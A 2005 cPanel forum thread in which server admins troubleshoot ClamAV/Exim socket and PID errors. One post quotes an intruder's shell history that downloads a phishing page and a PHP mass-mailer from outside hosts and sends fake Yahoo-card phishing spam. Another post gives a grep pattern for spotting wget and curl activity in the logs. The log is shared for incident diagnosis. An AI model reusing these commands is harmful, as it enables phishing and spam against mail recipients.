The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Exim / ClamAV(Connecter) issues

Discussion in 'General Discussion' started by stdout, Jul 13, 2005.

  1. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Hello, I need some input over here.

    I have installed clamavconnector 0.86.1-1.0, and now get a load of clam errors.
    This is the second server that I am seeing this on today. I had simply removed ClamAV all together on the rpevious server. I dont want to have to do the same with this one. What choices do I have? I have uninstalled clamavconnecter and I am still seeing this error.
    eximup --force, cupup --force both yield nothing.

    Am I the only one who was stupid enough to try this addon module on 2 different servers? has anyone else experienced this?

    -
    root@moon [~]# tail /var/log/exim_paniclog
    2005-07-13 22:06:44 1DsoRI-0007hz-9f malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:44 1DsoRI-0007i0-Cv malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:46 1DsoRK-0007i1-6S malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:47 1DsoRL-0007i5-Or malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:49 1DsoRN-0007i6-63 malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:53 1DsoRR-0007iA-C9 malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:53 1DsoRR-0007i9-Ba malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:06:56 1DsoRT-0007iG-LL malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:07:01 1DsoRZ-0007iL-CM malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:07:01 1DsoRZ-0007iM-Bt malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    root@moon [~]# ls -l /var/run/clamav/clamd
    srwxrwxrwx 1 root root 0 Jun 26 01:52 /var/run/clamav/clamd=
    root@moon [~]# date
    Wed Jul 13 22:07:16 BST 2005
    root@moon [~]# service exim restart
    Shutting down clamd: [ OK ]
    Shutting down exim: [ OK ]
    Shutting down antirelayd: [ OK ]
    Shutting down spamd: [ OK ]
    Starting clamd: [ OK ]
    Starting exim-26: [ OK ]
    Starting exim: [ OK ]
    Starting exim-smtps: [ OK ]
    Starting antirelayd: [ OK ]
    Starting spamd: Could not create INET socket on 127.0.0.1:783: Address already in use (IO::Socket::INET: Address already in use)
    [FAILED]
    root@moon [~]# tail -n 5 /var/log/exim_paniclog
    2005-07-13 22:08:10 1DsoSf-0007my-Vj malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:08:11 1DsoSg-0007mu-JB malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:08:29 1DsoSz-0007rY-7K malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:08:29 1DsoSz-0007rY-Li malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    2005-07-13 22:08:30 1DsoT0-0007rU-Ok malware acl condition: clamd: unable to connect to UNIX socket /var/run/clamav/clamd (Connection refused)
    root@moon [~]#
    -

    What are your thoughts?
     
  2. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    I have disabled ClamAV on both servers now, Luckily i had only applied this on 2 of our servers. Please respond with any fixes, patches or ideas that i could attempt.
     
  3. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16
    I'm seeing the same problem on one of our servers, but don't know why either....what did you do to disable?
     
  4. Snowman30

    Snowman30 Well-Known Member
    PartnerNOC

    Joined:
    Apr 7, 2002
    Messages:
    681
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    DataCenter Provider
    Ive just noticed an issue with Clam on our servers.

    Despite it being enabled and configured for all users in the clients cpanels it returns:
    ive removed and re-installed cpanel pro and clamavconnector but still no joy.

    Running WHM 10.3.1 cPanel 10.4.0-C150

    anyone have any ideas?
     
  5. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Someone had told me to upgrade to Edge, which I ended up doing - Do NOT do this.

    It did fix the problem, but had broke Fnatastico as the newest Edge release is now changing permissions to httpd.conf/mysql configurations..

    I had the same issues with other servers, It was a matter of playing with cPanel's scripts...
    I remember removing clamd on a few servers all together as the downtime was just unacceptable. It did not make a good week.. Remove Pro as there is/was a CWD.so issue.

    restartsrv_clamd works, if youre recieving connection refused in your paniclog...
    A reinstall > addon modules > clamavconnecter/pro would be recommended aswell..

    P.S. Has anyone else been seeing this automatted spam script sending "enviar.txt"? It has targettings 3 servers so far. What script is it targetting as the victims has numerous scripts in thier homedirs which i just dont have the time to go through.. I am guessing it is automatted as I am seeing identicals filenames accross servers.
     
  6. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Just a quick update:
    I guess it isnt an automatted script.

    -
    php -q enviar.txt "Mundo das mensagens" mundodasmensagens@ig "Uma linda mensagem para voce Meu amor" lista10.txt index.html
    history
    php -q enviar.txt "Mundo das mensagens" mundodasmensagens@ig "Uma linda mensagem para voce Meu amor" lista11.txt index.html
    history
    php -q enviar.txt "Mundo das mensagens" mundodasmensagens@ig "Uma linda mensagem para voce Meu amor" lista12.txt index.html
    history
    php -q enviar.txt "Mundo das mensagens" mundodasmensagens@ig "Uma linda mensagem para voce Meu amor" lista23.txt index.html
    echo firmanet1@yahoo.ca > mail.txt;wget lnxr0x.hpgvip.ig.com.br/phan.txt;wget
    lnxr0x.hpgvip.ig.com.br/enviar.txt;mv phan.txt index.html;php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns,



    Voc recebeu um carto YAHOO" mail.txt index.html
    echo firmanet1@yahoo.ca > mail.txt;wget lnxr0x.hpgvip.ig.com.br/phan.txt;wget lnxr0x.hpgvip.ig.com.br/enviar.txt;mv phan.txt index.html;php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" mail.txt index.html
    php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" email13.txt index.html
    php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" lista13.txt index.html
    ps x
    cd /var/tmp;rm -rf p;mkdir p;cd p;echo firmanet1@yahoo.ca > mail.txt
    cd /dev/shm
    ls
    echo firmanet1@yahoo.ca > mail.txt
    wget
    GET lnxr0x.hpgvip.ig.com.br/phan.txt > phan.txt
    GET lnxr0x.hpgvip.ig.com.br/enviar.txt > enviar.txt
    mv phan.txt index.html;php -q enviar.txt "Cartes YAHOO" cartoes@yahoo.com.br "Parabns, Voc recebeu um carto YAHOO" mail.txt index.html
    GET http://geocities.yahoo.com.br/phantasma_25/email10.txt
    GET http://geocities.yahoo.com.br/phantasma_25/email10.txt > email10.txt
    GET http://geocities.yahoo.com.br/phantasma_25/email1.txt > email1.txt
    GET http://br.share.geocities.com/phantasma_25/email46.txt > email46.txt
    GET http://lordlovelife.com/nomes-br.txt
    ls
    wget
    GET http://lordlovelife.com/nomes-br.txt > nomes-br.txt
    ls
    GET http://lordlovelife.com/a.txt > a.txt
    perl a.txt hotmail.com
    ls
    cat list* > mail.txt
    rm list*
    ls
    php -q
    -

    Any thoughts?
     
  7. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Brazillian Crew

    That is from a Brazillian hacking crew that also targeted the University of Stanford and MS.

    Know this, it reports weaknesses to an IRC channel, so I am suer you have a lot more stuff creeping around. Check /tmp etc. The whole begins with some web based chats, etc.
     
  8. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Re

    If you're having this problem, try replacing the clamd socket path from "/var/run/clamav/clamd" to "/var/clamd"
    av_scanner = clamd:/var/run/clamav/clamd
    av_scanner = clamd:/var/clamd

    There are quite a few new PHP/XSS based worms floating around. Since my last post I've setup a cronjob to tail -n 1000 /etc/httpd/domlogs/* and to grep for various tmp/wget/curl strings - it works wonders, I suggest others do the same to keep an eye on things.
     
  9. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Are you doing this hourly, or?...

    Thank you.
     
    #9 PanelGuy, Nov 10, 2005
    Last edited: Nov 11, 2005
  10. Zaf

    Zaf Well-Known Member

    Joined:
    Aug 22, 2005
    Messages:
    119
    Likes Received:
    0
    Trophy Points:
    16
    Probably this is the command command
    Code:
    tail -n 1000 /etc/httpd/domlogs/* | grep -E 'tmp|wget|curl'
     
  11. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Mine is set to av_scanner = clamd:/usr/sbin/clamd because that is where clamd is for some reason.

    And I am riddled with spamd and clamd connection refused or permission denied errors, no matter what I do.

    Is the point of your change - that I should be aiming at the clamd.pid file?
     
    #11 PanelGuy, Nov 12, 2005
    Last edited: Nov 12, 2005
  12. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Strange path.
    Comment out the line, or make a backup of your current exim.conf

    Try use one of the following and then tail your /var/log/exim_paniclog.
    av_scanner = clamd:/var/run/clamav/clamd
    av_scanner = clamd:/var/clamd
     
  13. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Ok, read edit above too.

    Also, note in my clamd.conf, how shold these two be set?
    LocalSocket /var/run/clamav/clamd
    PidFile /var/run/clamd.pid

    I have made the clamav directory just for the log and made it chown -R mail:mail with clamav in the mail group.

    I originally had the .pid file there, but changed it, as you can see above.
     
  14. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    clamd issue remains

    Result:
    /var/clamd (No such file or directory)
    /var/clamav/clamd (No such file or directory)

    If I change everything back, then pay very close attention to permissions, I geet it to start up fine, but then it says:

    WARNING: Socket file /var/run/clamav exists. Unclean shutdown? Removing...
    ERROR: Socket file /var/run/clamav could not be removed: Permission denied

    Is it expecting the file name or the directory, in clamd.conf, for LocalSocket?
     
    #14 PanelGuy, Nov 12, 2005
    Last edited: Nov 12, 2005
  15. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Leave clamd.conf untouched

    exim.conf:
    av_scanner = clamd:/var/run/clamav

    /scripts/restartsrv_clamd; check your exim_paniclog, no clam errors should be reported.

    also tail your /var/log/clamd.log (if configured), this file gets quite large, you may need to echo > clamd.log, if the logfile size has exceeded.

    If youre still having problems, log into your WHM, Addon Modules - uninstall/install ClamAV Connecter.
     
  16. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Its the clamd socket file, not executable, pid file.
     
  17. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    If i set it to what you wrote it says it's not there, if I set it back to /usr/sbin/clamd it starts but then:
    Clamd.log says:
    WARNING: Socket file /var/run/clamav exists. Unclean shutdown? Removing...
    ERROR: Socket file /var/run/clamav could not be removed: Permission denied

    I have removed and reisntalled through WHM several times, also removed CPanel Pro as that was also suggested.

    Removed and reinstalled seprately and at the same time.

    I'm hoping you can help.
     
  18. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    Ok, I changed the clamd.conf so that it points to the LocalSocket as a file, and the result was semi-good. The only thing I get now is:

    ERROR: Socket file /var/run/clamav/clamd.sock could not be bound: Permission denied

    Which is still bad but moving forward.
     
    #18 PanelGuy, Nov 12, 2005
    Last edited: Nov 12, 2005
  19. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    .pid troubles

    OK, I am down to this one last issue, otherwise, I succesfully have clamd running.

    ERROR: Can't save PID in file /var/run/clamd.pid

    How do I fix that news? There are plenty of other working .pid files there, so it shouldn't be a permissions issue.
     
  20. PanelGuy

    PanelGuy Well-Known Member

    Joined:
    Oct 13, 2004
    Messages:
    106
    Likes Received:
    0
    Trophy Points:
    16
    clamd .pid and .sock

    Ok, the solution was simple. I made one directory for the .pid then chown clamv:clamav and a seperate directory for the .sock then chown mail:mail.

    All works!

    Now I ned to work on spamd which seems to be a more complex problem.

    Yes, these problems were inherited.
     
Loading...

Share This Page